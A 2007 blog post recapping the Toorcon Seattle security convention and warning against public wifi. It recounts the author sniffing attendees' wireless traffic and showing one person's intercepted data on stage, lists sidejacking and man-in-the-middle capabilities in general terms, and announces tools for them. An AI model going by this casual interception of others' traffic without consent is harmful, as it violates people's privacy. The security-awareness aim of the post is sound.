Monday, May 14, 2007

Blogging Toorcon/Seattle

The San Diego cybersecurity convention Toorcon has branched northwards with a cool concept. This year, they had a small con (150 people) on the weekend after BlueHat (Microsoft's internal cybersecurity con). It was in a small bar, talks lasted 20 minutes, and ended in with an hour of 5 minute "lightning" talks. The format rocked, hard.

I want to apologize for my talk. My talk was later in the day, so in the time leading up to the talk I was sniffing the wireless. (I wasn't alone, MANY other people were also sniffing the wireless). I started my talk by showing the sorts of things I could sniff about somebody, such as their AIM buddy list, their DNS requests, alternate e-mail addresses they use, and so forth. The person I showed was somebody that had a diverse set of information, but not somebody who was doing anything embarrassing. I specifically chose NOT to 'out' the attendee who was surfing gay porn during the talks (although I probably should have, since virtually nobody who goes to cybersecurity cons would be embarrassed by surfing gay porn). However, even if nothing embarrassing is shown, it's still embarrassing feeling a bit exposed like that (although, I should repeat: a lot of people will sniffing the traffic as well, my talk just exposed it).

The moral of the story is: DON'T USE OPEN WIFI AT CYBERSECURITY CONVENTIONS. Seriously, any wifi is dangerous. The dangers are:
1. I can sniff more interesting bits out of your traffic than you realize
2. I can hijack (or "sidejack") the web accounts you log onto
3. I can grab control of your browser (download history, cached passwords, etc.)
4. I can probably break into your machine
5. This works on Internet Explorer and Firefox on Mac, Linux, and Windows
6. …all using well-known, unpatched (and often unpatchable) techniques

I've already released my Ferret tool that sniffs interesting info (like I showed at the start of my talk). I'm going to be releasing my "sidejacking" tool that sniffs Web/2.0 session IDs, allow other people on the same wifi to gain access to your accounts even without man-in-the-middle attacks. I'm going to be releasing a "man-in-the-middle" tool that inserts JavaScript into your browser, essentially making every website you visit vulnerable to Cross Site Scripting (XSS) attacks against your browser.

There are two good alternatives to public wifi. The first is to setup a box at home and VPN to it, and harden the wifi adapter so that none of your normal system applications (e.g. NetBIOS) are bound to it.

The second alternative is mobile broadband like GPRS, EDGE, HSDPA, or EVDO. You can often access the Internet by "tethering" your mobile phone, or get one of the new notebooks with built-in adapters.

It's interesting to see that public wifi is still growing fast, with cities all across the United State creating municipal wifi networks. This means that more and more hackers will be attacking it. Now is a good time to start weaning yourself off of it.